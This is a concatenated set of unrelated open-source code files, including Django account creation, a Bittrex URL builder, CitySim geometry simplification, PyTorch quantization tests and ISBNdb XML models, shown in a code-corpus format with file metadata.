error_msg += NO_ACTION_PLS_FIX
return False, error_msg
for i, row in enumerate(cand_csv):
try:
candidatedto = CandidateDTO(row)
except AssertionError as e:
error_msg = "Invalid CSV format. Check that your columns are correctly labeled, there are NO blank rows, and filled out for each row."
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
error_msg += " "
error_msg += "Candidate error message: {}.".format(e)
error_msg += " "
error_msg += "Row Information at row {}: {}.".format(i + 1, row)
return False, error_msg
password = BaseUserManager.make_random_password(
None, length=DEFAULT_RANDOM_PASSWORD_LENGTH
)
duplicate, error_msg = check_duplicates(
candidatedto, row, email_set, username_set, i
)
if duplicate:
return False, error_msg
new_cand = User(
username=candidatedto.username,
email=candidatedto.email,
)
email_set.add(candidatedto.email)
username_set.add(candidatedto.username)
new_cand.first_name = candidatedto.first_name
new_cand.last_name = candidatedto.last_name
new_cand.set_password(password)
new_cand_list.append(new_cand)
email_passwords[new_cand.email] = password
progress_float = CAND_ACC_WEIGHT * 100 * (i + 1) / num_rows
if task is not None:
task.progress = round(progress_float)
task.save()
# Reset to CAND_ACC_WEIGHT in case floating point errors
progress_float = CAND_ACC_WEIGHT * 100
if task is not None:
task.progress = round(progress_float)
task.save()
num_of_accounts = len(email_set)
if num_of_accounts != num_rows:
error_msg = (
"Internal Error: number of accounts ({}) != number of rows ({})".format(
num_of_accounts, num_rows
)
)
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
return False, error_msg
# Release the memory once done
del email_set
del username_set
email_errors = []
for i, new_cand in enumerate(new_cand_list):
if i != 0 and i % 50 == 0:
time.sleep(10)
new_cand.save()
candidate_group.user_set.add(new_cand)
profile = Profile.objects.get(user=new_cand)
profile.candidate_semester = current_cand_semester
profile.save()
subject = "[HKN] Candidate account"
html_content = render_to_string(
"candidate/new_candidate_account_email.html",
{
"subject": subject,
"first_name": new_cand.first_name,
"username": new_cand.username,
"password": email_passwords[new_cand.email],
"website_link": website_login_link,
"img_link": get_rand_photo(),
},
)
if settings.DEBUG:
print("\n")
print(new_cand.first_name, new_cand.username, new_cand.email)
print(html_content)
print("\n")
else:
msg = EmailMultiAlternatives(
subject, subject, settings.NO_REPLY_EMAIL, [new_cand.email]
)
msg.attach_alternative(html_content, "text/html")
try:
msg.send()
except Exception as e:
email_errors.append((new_cand_list[i].email, str(e)))
progress_float = (CAND_ACC_WEIGHT * 100) + (
EMAIL_WEIGHT * 100 * (i + 1) / num_of_accounts
)
if task is not None:
task.progress = round(progress_float)
task.save()
# If gone through everything and no errors
if len(email_errors) > 0:
error_msg = (
"An error occured during the sending of emails. "
+ "Candidate Email and Error Messages: "
+ str(email_errors)
+ " --- "
+ "Inform CompServ of the errors, and inform the candidates "
+ "to access their accounts by resetting their password "
+ 'using "Forget your password?" in the Login page. '
+ "All {} candidates added!".format(num_of_accounts)
)
return False, error_msg
else:
return True, "Successfully added {} candidates!".format(num_of_accounts)
| 2.15625 | 2 |
bittrex_api/utils/urls.py | kkristof200/py_bittrex_api | 18 | 12773199 | <reponame>kkristof200/py_bittrex_api<gh_stars>10-100
# --------------------------------------------------------------- Imports ----------------------------------------------------------------#
# System
from typing import Optional, Dict, Any
# Local
from . import strings
# ----------------------------------------------------------------------------------------------------------------------------------------#
# ------------------------------------------------------------- class: Urls --------------------------------------------------------------#
class Urls:
# ------------------------------------------------------------- Init -------------------------------------------------------------#
def __init__(
self,
base_url: str
):
self.base_url = base_url.strip('/')
# -------------------------------------------------------- Public methods --------------------------------------------------------#
@staticmethod
def join(*args) -> str:
comps = []
for arg in args:
if arg is not None:
comps.append(strings.to_string(arg).strip('/'))
return '/'.join(comps)
def url(
self,
*endpoints_args,
params: Optional[Dict] = None,
use_nonce: bool = True
) -> str:
endpoints_args = (self.base_url,) + endpoints_args
url = self.join(*endpoints_args)
if use_nonce and (params is None or 'nonce' not in params):
if params is None:
params = {}
from . import crypto
params['nonce'] = crypto.nonce()
if params is None:
return url
to_append = ''
for key, value in params.items():
if value is None:
continue
if len(to_append) == 0:
to_append += '?'
else:
to_append += '&'
to_append += strings.to_string(key) + '=' + strings.to_string(value)
return url + to_append
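# Illustrative usage (hypothetical base URL and endpoint, not a claim about
# the real Bittrex API):
#   urls = Urls('https://api.example.com/v1.1/')
#   urls.url('market', 'getopenorders', params={'market': 'BTC-LTC'})
#   -> 'https://api.example.com/v1.1/market/getopenorders?market=BTC-LTC&nonce=<ts>'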
# ----------------------------------------------------------------------------------------------------------------------------------------# | 1.859375 | 2 |
app/app_builder.py | cupskeee/App-MFE | 0 | 12773200 | import datetime
from flask import Flask, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from app.extensions.db import db
# from app.models import User
app = Flask(__name__)
app.config.from_object('config')
db.init_app(app)
# user_manager = UserManager(app, db, User)
# login_manager = LoginManager()
# login_manager.login_view = 'home.login'
# login_manager.init_app(app)
# QRcode(app, mode="google")
# @login_manager.user_loader
# def load_user(user_id):
# return User.query.get(user_id)
#
# @login_manager.unauthorized_handler
# def handle_needs_login():
# return redirect(url_for('home.login', msg="You have to be logged in to access this page."))
@app.context_processor
def inject_today_date():
return {'current_date': datetime.date.today()} | 2.703125 | 3 |
simplifycitysimgeometry.py | architecture-building-systems/design-performance-workflows | 5 | 12773201 | <gh_stars>1-10
'''
simplifycitysimgeometry.py
Using a similar algorithm to shading.py, simplify rectangles in
the CitySim xml file by combining walls that belong to the same
building and zone and have the same construction information.
Take special care with opacity...
'''
from eppy.geometry.surface import tilt, angle2vecs, area
from lxml import etree
import numpy as np
import itertools
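# Typical invocation sketch (illustrative, not from the original script):
#   tree = etree.parse('citysim_scene.xml')
#   simplify(tree)
#   tree.write('citysim_scene_simplified.xml')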
def simplify(citysim_xml):
to_delete = simplify_one_level(collect_walls(citysim_xml))
while len(to_delete):
for wall in to_delete:
wall.getparent().remove(wall)
to_delete = simplify_one_level(collect_walls(citysim_xml))
return citysim_xml
def simplify_one_level(walls):
'''
run one pass of simplifications - this needs to be repeated until
no more simplifications are found
    to_delete is a set of Wall elements that were merged into another wall
    and should be removed from the tree.
'''
to_delete = set()
print 'simplify_one_level', len(walls)
for wa, wb in itertools.combinations(walls, 2):
if not same_zone(wa, wb):
continue
if not same_construction(wa, wb):
continue
if wa in to_delete or wb in to_delete:
# one of these has already been merged!
continue
pa = get_polygon(wa)
pb = get_polygon(wb)
if len(points_in_common(pa, pb)) != 2:
# ignore these as they can't possibly share an edge
continue
pa = canonical_rotation(pa)
pb = canonical_rotation(pb)
if np.isclose(pa[0][2], pb[0][2]):
# not above each other...
continue
# swap the two polygons so that pa is the upper and pb the lower
# polygon - that way we can always index them the same:
# a1 ----- a2
# | |
# | |
# a0 ----- a3 (a0 == b1, a3 == b2)
# | |
# | |
# b0 ----- b3
if pa[0][2] < pb[0][2]:
wa, wb = wb, wa
pa, pb = pb, pa
pnew = [pb[0], pa[1], pa[2], pb[3]]
set_polygon(wa, pnew)
wa.set('Area', str(area(pnew)))
merge_windows(wa, wb)
to_delete.add(wb)
print '-', wa.get('id'), wb.get('id')
return to_delete
def canonical_rotation(polygon):
'''
for our algorithm, a canonically rotated polygon
has polygon = [a, b, c, d] with:
a.z < b.z
a.z == d.z
b.z == c.z
c.z > d.z
that is, the first vertex is a lower corner and
the next vertex an upper corner.
'''
assert len(polygon) == 4, 'only for rectangles!'
def only_two_z_values(polygon):
zs = set(v[2] for v in polygon)
for z0, z1 in itertools.combinations(zs, 2):
if np.isclose(z0, z1) and z0 in zs:
zs.remove(z0)
return len(zs) == 2
assert only_two_z_values(polygon), 'only two z-values allowed! %s' % set(v[2] for v in polygon) # noqa
def is_canonical(polygon):
a, b, c, d = polygon
return all((a[2] < b[2],
np.isclose(a[2], d[2]),
np.isclose(b[2], c[2]),
c[2] > d[2]))
for i in range(4): # make sure we don't loop forever on bad data!
if is_canonical(polygon):
return polygon
polygon = rotate(polygon)
assert False, 'polygon bad: %s' % polygon
def array_contains(array, item):
return any([is_same_vertex(item, x) for x in array])
def is_same_vertex(v0, v1):
return np.isclose(v0, v1).all()
def points_in_common(a, b):
'''
a: [array(x1, y1, z1), ... array(xn, yn, zn)]
b: [array(x1, y1, z1), ... array(xn, yn, zn)]
--> [array(xk, yk, zk), ... array(xl, yl, zl)]
with k and l being vertices in both polygons.
'''
result = []
for vertex in a:
if array_contains(b, vertex):
result.append(vertex)
return result
def get_number_of_vertices(obj):
'''
return the number of vertices - autocalculate,
since it is not always entered...
'''
return len(get_polygon(obj))
def collect_walls(citysim_xml):
'''return the Wall nodes objects
that are walls (vertical) and have 4 vertices
and rectangular'''
result = []
for wall in citysim_xml.findall('/District/Building/Zone/Wall'):
if get_number_of_vertices(wall) != 4:
# ignore this one
continue
polygon = get_polygon(wall)
try:
if not np.isclose(90.0, tilt(polygon)):
# ignore this one too
continue
        except Exception:
print 'bad polygon:', 'Wall@id=%s' % wall.get('id'), polygon
continue
vectors = [line[0] - line[1]
for line in zip(polygon, rotate(polygon))]
if not all([np.isclose(90.0, angle2vecs(v[0], v[1]))
for v in zip(vectors, rotate(vectors))]):
# not rectangular
continue
# meets criteria
result.append(wall)
return result
def get_polygon(wall):
'''
return a polygon representing the surface.
each vertices is an np.array.
'''
polygon = []
for v in wall.getchildren():
if v.tag.startswith('V'):
polygon.append(np.array((
float(v.get('x')),
float(v.get('y')),
float(v.get('z')))))
return polygon
def set_polygon(wall, polygon):
'''
set the vertices of a polygon.
'''
# delete old vertices
for vertex_xml in wall.getchildren():
if vertex_xml.tag.startswith('V'):
wall.remove(vertex_xml)
# add new vertices
for i, v in enumerate(polygon):
vertex_xml = etree.Element('V%i' % i)
vertex_xml.set('x', str(v[0]))
vertex_xml.set('y', str(v[1]))
vertex_xml.set('z', str(v[2]))
wall.append(vertex_xml)
def rotate(lst):
'''[a, b, c] --> [b, c, a]'''
result = lst[1:]
result.append(lst[0])
return result
def same_zone(wa, wb):
'''return True, if wa and wb are both children of the
same Building/Zone'''
return wa.getparent() == wb.getparent()
def same_construction(wa, wb):
'''return True, if wa and wb share construction information'''
return wa.get('type') == wb.get('type')
def merge_windows(wa, wb):
'''
update the attributes for the glazing / windows e.g.:
GlazingRatio="0.43"
GlazingGValue="0.7"
GlazingUValue="1.1"
ShortWaveReflectance="0.2"
Uvalue="0.5331238918939453"
using a weighted average for each value.
FIXME: is this physically correct?!
'''
aa = area(get_polygon(wa))
ab = area(get_polygon(wb))
attributes = ['GlazingRatio',
'GlazingGValue',
'GlazingUValue',
'ShortWaveReflectance',
'Uvalue']
for attrib in attributes:
wa.set(attrib, str(weighted_average(
get_float(wa, attrib),
get_float(wb, attrib),
aa, ab)))
def get_float(element, attribute):
return float(element.get(attribute, '0.0'))
def weighted_average(va, vb, aa, ab):
return (aa * va + ab * vb) / (aa + ab)
| 2.84375 | 3 |
loaders/attachments/test/test_opportunity_downloader.py | datumradix/fbointel | 57 | 12773202 | from contextlib import closing
from downloader import AttachmentDownloader
import unittest
import shelve
import os.path
class TestOpportunityDownloader(unittest.TestCase):
def setUp(self):
self.test_data = {
'FA4626-14-R-0011': [
{
'desc': 'Solicitation',
'filename': 'Solicitation.doc',
'url': 'https://www.fbo.gov/utils/view?id=46b7d20b80ba577b5e4dd10b1561b247'
},
{
'desc': 'Attch 1 Specifications',
'filename': 'Attch_1_Specifications.zip',
'url': 'https://www.fbo.gov/utils/view?id=f08375882eee4900f88a748fb8a941c7'
},
{
'desc': 'Attch 2 Material Submittal',
'filename': 'Attch_2_Submittal_Schedule.pdf',
'url': 'https://www.fbo.gov/utils/view?id=6b5544a2b5f254ae1dcfaea41f155960'
}
],
'FA-FOO-BAR-BAZ': [
{
'desc': 'Attch 3 Schedule of Drawings',
'filename': 'Attch_3_Schedule_of_Drawings.pdf',
'url': 'https://www.fbo.gov/utils/view?id=9e6640c9840978099dbe08351d0802bf'
},
{
'desc': 'Attch 4 Drawings',
'filename': 'Attch_4_Drawings.zip',
'url': 'https://www.fbo.gov/utils/view?id=58e041568e210a73884254db1c069855'
},
{
'desc': 'Attch 5 Wage Determination',
'filename': 'Attch_5_Wage_Determination.docx',
'url': 'https://www.fbo.gov/utils/view?id=7301f9274d34ebbf3ec3ff8df04968e4'
},
{
'desc': 'Attch 6 Base Entry Policy',
'filename': 'Attch_6_Base_Entry_Policy_Letter.pdf',
'url': 'https://www.fbo.gov/utils/view?id=b4e13ed9cdeb5eec3822465565810457'
}
]
}
with closing(shelve.open('test_attach')) as db:
for key in self.test_data:
db[key] = self.test_data[key]
def test_constructs_solnbr_download_directory_name(self):
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
self.assertEqual(downloader.dir_for_solnbr('FA-FOO-BAR-BAZ'), 'py_test_dls/FA-FOO-BAR-BAZ')
def test_creates_solnbr_download_directory(self):
solnbr = 'FA-FOO-BAR-BAZ'
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
dirpath = downloader.dir_for_solnbr(solnbr)
downloader.create_dir_by_solnbr(solnbr)
self.assertTrue(os.path.isdir(dirpath))
# clean up
os.rmdir(dirpath)
self.assertFalse(os.path.isdir(dirpath))
def test_downloader_does_not_care_if_directory_already_exists(self):
solnbr = 'FA-FOO-BAR-BAZ'
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
downloader.create_dir_by_solnbr(solnbr)
downloader.create_dir_by_solnbr(solnbr)
# clean up
os.rmdir(downloader.dir_for_solnbr(solnbr))
if __name__ == '__main__':
unittest.main()
| 2.5 | 2 |
tools/pytorch-quantization/tests/integration_test.py | GreyZzzzzzXh/TensorRT | 0 | 12773203 | <filename>tools/pytorch-quantization/tests/integration_test.py<gh_stars>0
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""tests of integrating Quant layers into a network"""
import pytest
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
from apex.amp import _amp_state
from pytorch_quantization import tensor_quant
from pytorch_quantization import quant_modules
from pytorch_quantization import nn as quant_nn
from pytorch_quantization.tensor_quant import QuantDescriptor
from tests.fixtures.models import LeNet, QuantLeNet
from tests.fixtures import verbose
np.random.seed(12345) # seed 1234 causes 1 number mismatch at 6th decimal in one of the tests
# make everything run on the GPU
torch.set_default_tensor_type('torch.cuda.FloatTensor')
# pylint:disable=missing-docstring, no-self-use
class TestNetwork():
"""test basic operations of quantized network"""
def test_simple_build(self):
"""test instantiation"""
quant_model = QuantLeNet(quant_desc_input=QuantDescriptor(), quant_desc_weight=QuantDescriptor())
for name, module in quant_model.named_modules():
if "quantizer" in name:
module.disable()
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
input_desc = QuantDescriptor(amax=6.)
weight_desc = QuantDescriptor(amax=1.)
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
def test_forward(self):
"""test forward pass with random data"""
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
output = quant_model(torch.empty(16, 1, 28, 28))
def test_backward(self):
"""test one iteration with random data and labels"""
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
optimizer = optim.SGD(quant_model.parameters(), lr=0.01)
optimizer.zero_grad()
output = quant_model(torch.empty(16, 1, 28, 28))
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
loss.backward()
optimizer.step()
def test_apex_amp_fp16(self):
"""test one iteration with random data and labels"""
try:
from apex import amp
except ImportError:
pytest.skip("AMP is not available.")
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
optimizer = optim.SGD(model.parameters(), lr=0.01)
model, optimizer = amp.initialize(model, optimizer, opt_level="O1")
optimizer.zero_grad()
output = model(torch.empty(16, 1, 28, 28))
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
optimizer.step()
assert loss.dtype == torch.float32
_amp_state.handle._deactivate()
def test_native_amp_fp16(self):
"""test one iteration with random data and labels"""
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
optimizer = optim.SGD(model.parameters(), lr=0.01)
optimizer.zero_grad()
with torch.cuda.amp.autocast():
output = model(torch.empty(16, 1, 28, 28))
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
loss.backward()
optimizer.step()
assert loss.dtype == torch.float32
def test_asp(self):
"""test Sparsity (ASP) and QAT toolkits together"""
try:
from apex.contrib.sparsity import ASP
except ImportError:
pytest.skip("ASP is not available.")
quant_modules.initialize()
model = LeNet()
quant_modules.deactivate()
optimizer = optim.SGD(model.parameters(), lr=0.01)
ASP.init_model_for_pruning(
model,
mask_calculator="m4n2_1d",
verbosity=2,
whitelist=[torch.nn.Linear, torch.nn.Conv2d, torch.nn.Conv3d, quant_nn.modules.quant_linear.QuantLinear],
allow_recompute_mask=False,
custom_layer_dict={
quant_nn.QuantConv1d: ['weight'],
quant_nn.QuantConv2d: ['weight'],
quant_nn.QuantConv3d: ['weight'],
quant_nn.QuantConvTranspose1d: ['weight'],
quant_nn.QuantConvTranspose2d: ['weight'],
quant_nn.QuantConvTranspose3d: ['weight'],
quant_nn.QuantLinear: ['weight']
})
ASP.init_optimizer_for_pruning(optimizer)
ASP.compute_sparse_masks()
model = model.to('cuda')
output = model(torch.empty(16, 1, 28, 28).to('cuda'))
optimizer.zero_grad()
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
loss.backward()
optimizer.step()
def test_quant_module_replacement(self):
"""test monkey patching of modules with their quantized versions"""
lenet = LeNet()
qlenet = QuantLeNet()
mod_list = [type(mod) for name, mod in lenet.named_modules()]
mod_list = mod_list[1:]
qmod_list = [type(mod) for name, mod in qlenet.named_modules()]
qmod_list = qmod_list[1:]
# Before any monkey patching, the networks should be different
assert(mod_list != qmod_list)
# Monkey patch the modules
no_replace_list = ["Linear"]
custom_quant_modules = [(torch.nn, "Linear", quant_nn.QuantLinear)]
quant_modules.initialize(no_replace_list, custom_quant_modules)
lenet = LeNet()
qlenet = QuantLeNet()
mod_list = [type(mod) for name, mod in lenet.named_modules()]
mod_list = mod_list[1:]
qmod_list = [type(mod) for name, mod in qlenet.named_modules()]
qmod_list = qmod_list[1:]
# After monkey patching, the networks should be same
assert(mod_list == qmod_list)
# Reverse monkey patching
quant_modules.deactivate()
lenet = LeNet()
qlenet = QuantLeNet()
mod_list = [type(mod) for name, mod in lenet.named_modules()]
mod_list = mod_list[1:]
qmod_list = [type(mod) for name, mod in qlenet.named_modules()]
qmod_list = qmod_list[1:]
# After reversing monkey patching, the networks should again be different
assert(mod_list != qmod_list)
def test_calibration(self):
quant_model = QuantLeNet(quant_desc_input=QuantDescriptor(), quant_desc_weight=QuantDescriptor()).cuda()
for name, module in quant_model.named_modules():
if name.endswith("_quantizer"):
if module._calibrator is not None:
module.disable_quant()
module.enable_calib()
else:
module.disable()
print(F"{name:40}: {module}")
quant_model(torch.rand(16, 1, 224, 224, device="cuda"))
# Load calib result and disable calibration
for name, module in quant_model.named_modules():
if name.endswith("_quantizer"):
if module._calibrator is not None:
module.load_calib_amax()
module.enable_quant()
module.disable_calib()
else:
module.enable()
quant_model.cuda()
| 1.890625 | 2 |
src/generalStatistics/generalStatistics.py | nickeita/su2021_is601_project2 | 0 | 12773204 | from statsAuxiliary.statsAuxiliary import StatsAuxiliary
from generalStatistics.generalMedian import general_median
from generalStatistics.generalMode import general_mode
from generalStatistics.generalMean import general_mean
class GeneralStatistics(StatsAuxiliary):
result = 0
    def __init__(self):
        super().__init__()
def g_mean(self, a):
self.result = general_mean(a)
return self.result
def g_median(self, a):
self.result = general_median(a)
return self.result
def g_mode(self, a):
self.result = general_mode(a)
return self.result
| 2.546875 | 3 |
easy_maps/admin.py | cyber-barrista/django-easy-maps | 114 | 12773205 | # -*- coding: utf-8 -*-
from django import forms
from django.contrib import admin
from django.utils.translation import gettext_lazy as _
from .models import Address
from .widgets import AddressWithMapWidget
class HasExceptionFilter(admin.SimpleListFilter):
title = _("exception")
parameter_name = "has_exception"
def lookups(self, request, model_admin):
return (
(1, _("Yes")),
(0, _("No")),
)
def queryset(self, request, queryset):
if self.value() is not None:
ids = Address.objects.values_list("pk", flat=True)
if self.value() == "1":
return queryset.filter(pk__in=ids)
elif self.value() == "0":
return queryset.exclude(pk__in=ids)
return queryset
class AddressAdmin(admin.ModelAdmin):
list_display = ["address", "computed_address", "latitude", "longitude", "has_exception"]
list_filter = [HasExceptionFilter]
search_fields = ["address"]
class form(forms.ModelForm):
class Meta:
widgets = {"address": AddressWithMapWidget({"class": "vTextField"})}
| 2.1875 | 2 |
isbndb/models.py | bbengfort/isbndb-python | 4 | 12773206 | <reponame>bbengfort/isbndb-python
class Model(object):
def __init__(self, xml):
self.raw_data = xml
def __str__(self):
return self.raw_data.toprettyxml( )
def _get_attribute(self, attr):
val = self.raw_data.getAttribute(attr)
if val == '':
return None
return val
def _get_element(self, name):
nodes = self.raw_data.getElementsByTagName(name)
if len(nodes) == 0:
return None
if len(nodes) > 1:
raise AttributeError("Too many elements with name %s" % name)
return nodes[0]
def _get_childNodes(self, name):
return self._get_element(name).childNodes if self._get_element(name) else []
def _get_nodeValue(self, node):
if isinstance(node, str):
nodes = self._get_childNodes(node)
elif hasattr(node, 'childNodes'):
nodes = node.childNodes
else:
return None
if len(nodes) == 0:
return None
if len(nodes) > 1:
raise AttributeError("Unable to parse value from node with name %s" % name)
return nodes[0].nodeValue
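# Hypothetical usage sketch (assumes an ISBNdb XML response element; Book is defined below):
#   from xml.dom import minidom
#   book = Book(minidom.parseString(response_xml).documentElement)
#   print book.title, book.isbn13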
class Book(Model):
@property
def book_id(self):
return self._get_attribute('book_id')
@property
def isbn(self):
return self._get_attribute('isbn')
@property
def isbn13(self):
return self._get_attribute('isbn13')
@property
def title(self):
return self._get_nodeValue('Title')
@property
def title_long(self):
return self._get_nodeValue('TitleLong')
@property
def authors_text(self):
return self._get_nodeValue('AuthorsText')
@property
def authors(self):
for node in self._get_childNodes('Authors'):
if node.nodeType == node.ELEMENT_NODE:
aid = node.getAttribute('person_id')
name = self._get_nodeValue(node)
yield {
'person_id': aid,
'person_text': name,
}
@property
def publisher_id(self):
pelem = self._get_element('PublisherText')
if pelem is not None:
val = pelem.getAttribute('publisher_id')
if val != '':
return val
return None
@property
def publisher_text(self):
return self._get_nodeValue('PublisherText')
@property
def details(self):
delem = self._get_element('Details')
if delem is not None:
return dict(delem.attributes.items())
return None
@property
def summary(self):
return self._get_nodeValue('Summary')
@property
def notes(self):
return self._get_nodeValue('Notes')
@property
def urls_text(self):
return self._get_nodeValue('UrlsText')
@property
def awards_text(self):
return self._get_nodeValue('AwardsText')
@property
def prices(self):
for node in self._get_childNodes('Prices'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
@property
def subjects(self):
for node in self._get_childNodes('Subjects'):
if node.nodeType == node.ELEMENT_NODE:
sid = node.getAttribute('subject_id')
text = self._get_nodeValue(node)
yield {
'subject_id': sid,
'subject_text': text,
}
@property
def marc_records(self):
for node in self._get_childNodes('MARCRecords'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
class Subject(Model):
@property
def subject_id(self):
return self._get_attribute('subject_id')
@property
def book_count(self):
return self._get_attribute('book_count')
@property
def marc_field(self):
return self._get_attribute('marc_field')
@property
def marc_indicators(self):
return (self._get_attribute('marc_indicator_1'),
self._get_attribute('marc_indicator_2'))
@property
def name(self):
return self._get_nodeValue('Name')
@property
def categories(self):
for node in self._get_childNodes('Categories'):
if node.nodeType == node.ELEMENT_NODE:
cid = node.getAttribute('category_id')
text = self._get_nodeValue(node)
yield {
'category_id': cid,
'category_text': text,
}
@property
def structure(self):
for node in self._get_childNodes('SubjectStructure'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
class Category(Model):
@property
def category_id(self):
return self._get_attribute('category_id')
@property
def parent_id(self):
return self._get_attribute('parent_id')
@property
def name(self):
return self._get_nodeValue('Name')
@property
def details(self):
delem = self._get_element('Details')
if delem:
return dict(delem.attributes.items())
return {}
@property
def subcategories(self):
for node in self._get_childNodes('SubCategories'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
class Author(Model):
@property
def author_id(self):
return self._get_attribute('person_id')
@property
def name(self):
return self._get_nodeValue('Name')
@property
def details(self):
delem = self._get_element('Details')
if delem:
return dict(delem.attributes.items())
return None
@property
def categories(self):
for node in self._get_childNodes('Categories'):
if node.nodeType == node.ELEMENT_NODE:
cid = node.getAttribute('category_id')
text = self._get_nodeValue(node)
yield {
'category_id': cid,
'category_text': text,
}
@property
def subjects(self):
for node in self._get_childNodes('Subjects'):
if node.nodeType == node.ELEMENT_NODE:
sid = node.getAttribute('subject_id')
count = node.getAttribute('book_count')
text = self._get_nodeValue(node)
yield {
'subject_id': sid,
'book_count': count,
'subject_text': text,
}
class Publisher(Model):
@property
def publisher_id(self):
return self._get_attribute('publisher_id')
@property
def name(self):
return self._get_nodeValue('Name')
@property
def details(self):
delem = self._get_element('Details')
if delem:
return dict(delem.attributes.items())
return None
@property
def categories(self):
for node in self._get_childNodes('Categories'):
if node.nodeType == node.ELEMENT_NODE:
cid = node.getAttribute('category_id')
text = self._get_nodeValue(node)
yield {
'category_id': cid,
'category_text': text,
}
| 2.96875 | 3 |
test/test_helpers.py | caimmy/karuo | 0 | 12773207 | # _*_ coding: utf-8 _*_
"""
-------------------------------------------------
@File Name: test_helpers
@Description:
@Author: caimmy
@date: 2019/10/22 17:47
-------------------------------------------------
Change Activity:
-------------------------------------------------
"""
import unittest
from unittest import TestCase
import time, datetime
from karuo.helpers.logger_helper import LoggerTimedRotating
from karuo.helpers.date_helper import DatetimeHelper
from karuo.qywx.WXBizMsgCrypt import WXBizMsgCrypt
class HelperTest(TestCase):
def testTimedRotatingLogger(self):
l1 = LoggerTimedRotating.getInstance(r"./raws/t.log", logger="abc")
l1.debug("asdfasdf")
l2 = LoggerTimedRotating.getInstance(r"./raws/t.log", logger="adf")
l2.info("infor l2")
l3 = LoggerTimedRotating.getInstance(r"./raws/t1.log", logger="abc1")
l3.debug("debug l3")
def testDateBeforeNDays(self):
testDate = DatetimeHelper.date_before_n_days(3, datetime.datetime.strptime("2020-02-13 10:00:00", "%Y-%m-%d %H:%M:%S").timestamp())
self.assertEqual("2020-02-10", testDate.strftime("%Y-%m-%d"))
tStartDate = datetime.datetime.strptime("2020-02-13 10:00:00", "%Y-%m-%d %H:%M:%S")
t1, t2 = DatetimeHelper.day_range_of_timestamp(tStartDate, tStartDate)
self.assertEqual("2020-02-13 00:00:00", datetime.datetime.fromtimestamp(t1).strftime("%Y-%m-%d %H:%M:%S"))
self.assertEqual("2020-02-14 00:00:00", datetime.datetime.fromtimestamp(t2).strftime("%Y-%m-%d %H:%M:%S"))
def testDatelist(self):
ret_date_list = DatetimeHelper.date_list("2019-01-01", "2019-02-01")
self.assertEqual(len(ret_date_list), 31)
ret_date_list = DatetimeHelper.date_list("2019-01-01", "2019-02-01", True)
print(ret_date_list)
self.assertEqual(len(ret_date_list), 32)
def testWxencrypt(self):
sToken = "<KEY>"
sEncodingAESKey = "<KEY>"
sCorpID = "ww1436e0e65a779aee"
'''
        ------------ Usage example 1: verifying the callback URL ---------------
        * When the enterprise enables callback mode, WeCom (Enterprise WeChat) sends a GET request to the verification URL.
        Suppose that, when verification is triggered, the enterprise receives a request like:
        * GET /cgi-bin/wxpush?msg_signature=5c45ff5e21c57e6ad56bac8758b79b1d9ac89fd3&timestamp=1409659589&nonce=263014780&echostr=P9nAzCzyDtyTWESHep1vC5X9xho%2FqYX3Zpb4yKa9SKld1DsH3Iyt3tP3zNdtp%2B4RPcs8TgAE7OaBO%2BFZXvnaqQ%3D%3D
        * HTTP/1.1 Host: qy.weixin.qq.com
        On receiving this request, the enterprise should:
        1. Parse the GET parameters: the message signature (msg_signature), the timestamp (timestamp),
           the nonce (nonce), and the random encrypted string pushed by WeCom (echostr);
           remember to URL-decode them in this step.
        2. Verify that the message body signature is correct.
        3. Decrypt echostr and return the plaintext as the response to the GET request.
        Steps 2 and 3 can be implemented with the VerifyURL library function provided by WeCom.
'''
wxcpt=WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)
#sVerifyMsgSig=HttpUtils.ParseUrl("msg_signature")
#ret = wxcpt.VerifyAESKey()
#print ret
sVerifyMsgSig="012bc692d0a58dd4b10f8dfe5c4ac00ae211ebeb"
#sVerifyTimeStamp=HttpUtils.ParseUrl("timestamp")
